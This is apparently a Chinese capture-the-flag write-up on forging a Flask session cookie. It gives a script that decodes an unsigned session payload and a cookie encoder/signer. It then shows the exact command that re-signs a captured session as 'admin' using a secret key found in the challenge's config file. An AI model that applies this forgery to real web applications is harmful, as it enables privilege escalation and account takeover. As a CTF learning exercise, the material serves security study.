接解法一
解法二:Flask之session伪造 原理:首先要明确cookie和session的区别:cookie放在客户端,我们可以获得;session放在服务器,我们无法拿到。但是flask这种轻量级的框架把session也放在了客户端,因此我们能拿来修改,这就是我们能伪造session的原因。session加密了,可以用解密脚本来解密。我们将一般用户的session修改为admin的session,再用加密脚本加上密钥来加密成admin的session就OK了。
过程1、参考文章
Flask之session伪造(从某平台学习Session身份伪造)
2、找session
3、解密脚本,我在编译器运行的。
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
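def decryption(payload):
    """Unpack a Flask session cookie *without* checking its signature.

    The cookie value has the shape ``[.]<payload>.<timestamp>.<signature>``.
    This strips the timestamp and signature (both are discarded, nothing is
    verified), base64-decodes the payload, zlib-inflates it when the leading
    ``.`` flags it as compressed, and hands the bytes to Flask's
    ``session_json_serializer``.  Only encoding, not encryption, stands
    between the cookie and its contents, so anyone holding the cookie can
    read the session this way; that is why session data must never carry
    secrets.

    Args:
        payload: the raw cookie value as ``bytes``.  A ``str`` is accepted and
            ASCII-encoded (cookie values are urlsafe-base64 plus dots).

    Returns:
        The deserialized session object (a ``dict`` for a normal session).

    Raises:
        Exception: if the payload is not valid base64, or is flagged as
            compressed but does not inflate; the underlying error is chained
            as ``__cause__`` so it is not lost.
    """
    if isinstance(payload, str):
        payload = payload.encode('ascii')
    # Split from the right: the base64 body contains no '.', so the last two
    # dots always delimit the timestamp and the signature.
    payload, _signature = payload.rsplit(b'.', 1)
    payload, _timestamp = payload.rsplit(b'.', 1)
    compressed = payload.startswith(b'.')
    if compressed:
        payload = payload[1:]
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception') from e
    if compressed:
        try:
            payload = zlib.decompress(payload)
        except zlib.error as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload') from e
    return session_json_serializer.loads(payload)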
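if __name__ == '__main__':
    # Cookie captured by the author for the account named '1111'; it is the
    # default input so the script still works exactly as before when run with
    # no arguments.  Pass another cookie value as the first argument to decode
    # that one instead of editing the source.
    sample_cookie = ".eJxFkE-LwkAMxb_KkrOHdqwXwYv0DxUypTIyJBdxtTodjQtV2bbid99Blt3k8sh7_ODlCdtj19wczO_do5nAtj3A_AkfnzAH8pjQiJE254HNeVrZWgXda6GBPcYk9YjpacqpvrBsVMhO2S8FpVbo121lKdKWHY1LV5mD0Kjbyqw8KnZosxnbOqqKXNhmCUk56KLu2Qc9Zj0WOHCRuyotY60oZiGF6UGw0IGvHZpNz0X5zSYX8rSA1wT2t-64vX-dm-t_BZOFyH5AgxEJh6UEVaj1xrmLltzrMRedlgnZtcN0feHT4o1rZXdq_kgmX7H9da47CQbEYWACj1vTvd8WDvD6AQkBa-c.YmIMmA.vkGdxjLQqP1iKcggIjNESkzPtVE".encode()
    cookie = sys.argv[1].encode() if len(sys.argv) > 1 else sample_cookie
    print(decryption(cookie))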
4、运行结果,我注册的账号名为1111。
{'_fresh': True, '_id': b'b38c34592e979d65916f2f35bd3087d3efe6c37f0f2d624b9f45fac0a97fc3b92c3fa1a9ed48afea8bb24d1f18c110c2daa8257f5ff607f0cf2ca151db0e1fb6', 'csrf_token': b'57f35c100293753cef335c84b9df01784bb33a8f', 'image': b'DOK2', 'name': '1111', 'user_id': '10'}
5、到config文件找密钥
6、加密脚本
GITHUB给你爱
#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'
# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast
# Abstract Base Classes (PEP 3119): ``abc.ABC`` only exists from 3.4 on, so
# older 3.x interpreters get the metaclass spelling; Python 2 is refused.
if sys.version_info[0] < 3:
    raise Exception('Must be using at least Python 3')
elif sys.version_info[:2] < (3, 4):
    from abc import ABCMeta, abstractmethod
else:
    from abc import ABC, abstractmethod
# Lib for argument parsing
import argparse
# external Imports
from flask.sessions import SecureCookieSessionInterface
class MockApp(object):
    """Bare-bones stand-in for a ``flask.Flask`` application.

    ``SecureCookieSessionInterface.get_signing_serializer`` is handed an
    instance of this class instead of a real app; ``secret_key`` is the only
    attribute it is given.
    NOTE(review): newer Flask releases may also read ``app.config`` inside
    ``get_signing_serializer`` -- confirm against the installed version.
    """

    def __init__(self, secret_key):
        """Keep *secret_key* as the signing key; no validation is applied."""
        self.secret_key = secret_key
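# Only the ABC spelling differs between the two supported interpreter ranges,
# so pick the base class once instead of defining FSCM twice.
if sys.version_info[0] == 3 and sys.version_info[1] < 4:  # >= 3.0 && < 3.4
    _FSCMBase = ABCMeta('_FSCMBase', (object,), {})
else:  # >= 3.4
    _FSCMBase = ABC


class FSCM(_FSCMBase):
    """Flask Session Cookie Manager: encode and decode ``session`` cookies.

    Both operations are static; call them on the class
    (``FSCM.encode(...)``, ``FSCM.decode(...)``) as the ``__main__`` block
    does.  Failures are reported as a returned string, not raised, so callers
    must look for the ``[Encoding error]`` / ``[Decoding error]`` prefix.
    """

    @staticmethod
    def encode(secret_key, session_cookie_structure):
        """Encode a Flask session cookie.

        Args:
            secret_key: the application's ``SECRET_KEY``.  The signature on
                the produced cookie is only accepted by a server that holds
                this same key, which is the whole protection of the scheme.
            session_cookie_structure: a Python literal, as text, that
                ``ast.literal_eval`` turns into a dict.  ``literal_eval``
                accepts literals only, so the text is never executed.

        Returns:
            The signed cookie value, or ``"[Encoding error] ..."`` on failure.
        """
        try:
            app = MockApp(secret_key)
            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)
            return s.dumps(session_cookie_structure)
        except Exception as e:
            # CLI boundary: report instead of raising.  (The ``raise e`` that
            # used to follow this return was unreachable and has been dropped.)
            return "[Encoding error] {}".format(e)

    @staticmethod
    def decode(session_cookie_value, secret_key=None):
        """Decode a Flask cookie.

        Without *secret_key* the signature is ignored and only the payload is
        unpacked (base64, plus zlib when the value starts with ``.``); the raw
        serialized bytes are returned.  This path demonstrates that the
        client-side session is readable by whoever holds the cookie, which is
        why nothing confidential belongs in it.  With *secret_key* the cookie
        goes through Flask's own signing serializer, so a tampered cookie or
        one signed under another key comes back as a decoding error instead
        of data.

        Args:
            session_cookie_value: the raw cookie string.
            secret_key: the application's ``SECRET_KEY``, or ``None`` to skip
                verification.

        Returns:
            Raw payload ``bytes`` (no key), the session object (with key), or
            ``"[Decoding error] ..."`` on failure.
        """
        try:
            if secret_key is None:
                compressed = session_cookie_value.startswith('.')
                payload = session_cookie_value[1:] if compressed else session_cookie_value
                # The first dot-separated field is the payload; the timestamp
                # and signature that follow are simply dropped here.
                data = base64_decode(payload.split(".")[0])
                if compressed:
                    data = zlib.decompress(data)
                return data
            app = MockApp(secret_key)
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)
            return s.loads(session_cookie_value)
        except Exception as e:
            return "[Decoding error] {}".format(e)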
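if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    ## Description for help
    parser = argparse.ArgumentParser(
        description='Flask Session Cookie Decoder/Encoder',
        epilog="Author : Wilson Sumanang, Alexandre ZANNI")
    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='',
                               help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='',
                               help='Session cookie structure', required=True)
    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='',
                               help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='',
                               help='Session cookie value', required=True)
    ## get args
    args = parser.parse_args()
    ## dispatch: argparse already enforces the required options, so no extra
    ## presence checks are needed.  On decode a missing secret key arrives as
    ## None, which selects the signature-less payload dump in FSCM.decode.
    if args.subcommand == 'encode':
        print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif args.subcommand == 'decode':
        print(FSCM.decode(args.cookie_value, args.secret_key))
    else:
        # No sub-command given: previously this exited silently; show usage.
        parser.print_help()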
7、新建加密脚本为flask_session.py文件,密钥为ckj123,用下面的命令运行。
python flask_session.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'b38c34592e979d65916f2f35bd3087d3efe6c37f0f2d624b9f45fac0a97fc3b92c3fa1a9ed48afea8bb24d1f18c110c2daa8257f5ff607f0cf2ca151db0e1fb6', 'csrf_token': b'57f35c100293753cef335c84b9df01784bb33a8f', 'image': b'DOK2', 'name': 'admin', 'user_id': '10'}
"
8、运行成功
9、将session放回原位,刷新即可得到flag。
管他黑猫白猫,能抓到老鼠的就是好猫。